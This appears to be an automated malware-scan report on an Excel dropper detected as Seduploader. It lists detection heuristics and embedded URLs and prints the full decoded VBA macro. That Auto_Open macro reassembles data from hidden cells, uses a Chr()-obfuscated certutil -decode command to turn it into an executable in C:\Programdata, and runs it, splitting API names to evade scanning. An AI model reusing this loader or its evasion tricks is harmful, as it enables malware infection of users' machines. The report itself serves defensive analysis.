Verdict: MALICIOUS
Risk score: 390
Heuristics: 10
- ClamAV: Doc.Dropper.Seduploader-6784277-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Seduploader-6784277-0
- Malformed OLE auto-open stager with embedded ZIP payload (critical, OLE_RAW_MALFORMED_AUTOOPEN_STAGER): Raw malformed OLE bytes contain an auto-open macro entry, embedded ZIP/theme package bytes, VBA project metadata, and URL/CMD/Shell staging tokens. This is a high-confidence exploit-builder shape where the OLE directory is intentionally malformed, preventing normal VBA extraction while leaving the auto-run stager visible in raw streams.
- VBA macros detected (medium, OLE_VBA_MACROS, 5 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched line in script: `Shell (Chr(99) & Chr(101) & Chr(114) & Chr(116) & Chr(117) & Chr(116) & Chr(105) & Chr(108) & Chr(32) & _`
- Dangerous API name reassembled from split string literals (critical, OLE_VBA_SPLIT_KEYWORD_OBFUSCATION): VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning. Matched line in script: `Set scr = CreateObject("Scr" & "ipting.FileSy" & "stemObject")`
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched line in script: `Set scr = CreateObject("Scr" & "ipting.FileSy" & "stemObject")`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- Auto_Open macro (low, OLE_VBA_AUTO): Auto_Open macro. Matched line in script: `Sub Auto_Open()`
- Heap-spray pattern detected (high, SC_HEAP_SPRAY): Repeated 0x41 (A) bytes found. Disassembly hidden — these bytes score as degenerate, not coherent x86 code (single mnemonic 'inc' is 100% of instructions — a sled or padding/filler run, not program logic).
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://www.maritime-recon.com/janes (in document text, OLE body)
  - http://www.mobiledeployable.com/janes (in document text, OLE body)
  - http://www.globalsofsymposium.org/us#1 (in document text, OLE body)
  - http://www.maritime-recon.com/janes followed by an undecodable trailing byte (in document text, OLE body)
Extracted artifacts: 1
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2577 bytes | 65c3fe528293239f417e1129f19c1fe126b3214a35d389c66ca3477a3738222e |
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub Auto_Open()
ActiveSheet.Range("a1:c54").Font.Color = vbBlack
Call LinesOfBusiness.TQuH8wDO
End Sub
Attribute VB_Name = "LinesOfBusiness"
#If VBA7 Then
Public Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As LongPtr)
#Else
Public Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
#End If
Function GetVal(sr As Long, er As Long, c As Long)
Dim x
For i = sr To er
x = x + Cells(i, c)
Next
GetVal = x
End Function
Function GetRand()
Dim r As String
Dim i As Integer
Randomize
For i = 1 To 8
If i Mod 2 = 0 Then
r = Chr(Int((90 - 65 + 1) * Rnd + 65)) & r
Else
r = Int((9 * Rnd) + 1) & r
End If
Next i
GetRand = r
End Function
Sub cutil(code As String)
Dim x As String
x = "-----BEG" & "IN CER" & "TIFICATE-----"
x = "-----BEG" & "IN CER" & "TIFI" & "CATE-----"
x = x + vbNewLine
x = x + code
x = x + vbNewLine
x = x + "-----E" & "ND CERTIF" & "ICATE-----"
Dim path As String
path = "C:\Programdata\" & rndname & ".txt"
expath = "C:\Programdata\" & rndname & ".exe"
Set scr = CreateObject("Scr" & "ipting.FileSy" & "stemObject")
path = "C:\Programdata\" & GetRand & ".txt"
expath = "C:\Programdata\" & GetRand & ".exe"
Set scr = CreateObject("Scr" & "ipting.FileSy" & "stemOb" & "ject")
Set file = scr.CreateTextFile(path, True)
file.Write x
file.Close
Shell (Chr(99) & Chr(101) & Chr(114) & Chr(116) & Chr(117) & Chr(116) & Chr(105) & Chr(108) & Chr(32) & _
Chr(45) & Chr(100) & Chr(101) & Chr(99) & Chr(111) & Chr(100) & Chr(101) & Chr(32) & path & " " & expath)
Sleep 2000
Shell (expath)
End Sub
Sub TQuH8wDO()
Dim p As String
p = GetVal(2227, 2248, 170)
cutil (p)
End Sub
```